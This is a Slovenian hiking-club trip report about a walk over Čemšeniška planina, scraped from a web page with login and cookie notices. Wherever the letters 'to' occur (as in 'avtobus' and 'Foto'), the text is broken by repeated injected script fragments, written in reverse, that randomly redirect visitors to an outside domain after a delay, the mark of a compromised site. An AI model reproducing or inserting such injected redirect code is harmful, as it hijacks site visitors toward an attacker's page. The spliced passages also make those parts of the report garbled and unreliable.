ČEMŠENIŠKA PLANINA

Čemšeniška planina se dviguje nad Zasavjem, njen najvišji vrh pa je Črni vrh s 1205. metri. Na pot smo se odpravili ob 7.00 iz Avtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobusne postaje Šoštanj. Peljali smo se čez Prebold, natobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to pa čez Marijo Reko na vrh prelaza Podmeja. Tam smo si oprtali nahrbtnike in se peš odpravili naprej. Pot nas je vodila mimo koče pod Javorjem in planine Partizanski vrh. Šli smo mimo sedla Vrhe in planinskega doma Vrhe in od blizu opazovali Krvavico in njene krvave stene. Potem se je začel vzpon na Čemšeniško planino, kjer je pomlad kmalu zamenjala zima.  Pot je vodila po pogorju planine med drevjem, s katerih nas je obletaval sneg. Po slikanju na vrhu smo se spustili do koče dr. Franca Goloba, kjer smo si privoščili zasluženo malico, malo poklepetali in jo mahnili naprej. Po zmernem spustu smo prišli do Centra šolskih in obšolskih dejavnosti Prvine, kjer nas je malo nižje pobral avtobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobus. Kot obljubljeno smo se na hitro ustavili tudi na Trojanah, ker brez trojanskih krofov pač ne gre. V  Šoštanj smo se vrnili v popoldanskih urah.

Hodili smo 5 ur in naredili 13 km.

Zapisala: Kaja Koželjnik

Fotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to: Borut Zajc

 

0 komentarjev

Komentirajte

Login

Welcome! Login in to your account

Remember me Lost your password?

Don't have account. Register

Lost Password

Register

Na naši stran uporabljamo piškotke za pravilno delovanje strani in beleženje obiskanosti strani. S strinjanjem nam dovolite uporabo piškotkov.

Zasebne nastavitve shranjene!
Nastavitve zasebnosti

Ko obiščete katero koli spletno mesto, le to lahko shranjuje ali pridobi podatke v vašem brskalniku, večinoma v obliki piškotkov. Tukaj nadzirate svoje osebne nastavitce za piškotke.

Ti piškotki so potrebni za delovanje spletnega mesta in jih ni moč onemogočiti.

Za pravilno delovanje spletne strani uporabljamo naslednje tehnične piškotke:

Zavrni vse piškotke
Dovoli vse piškotki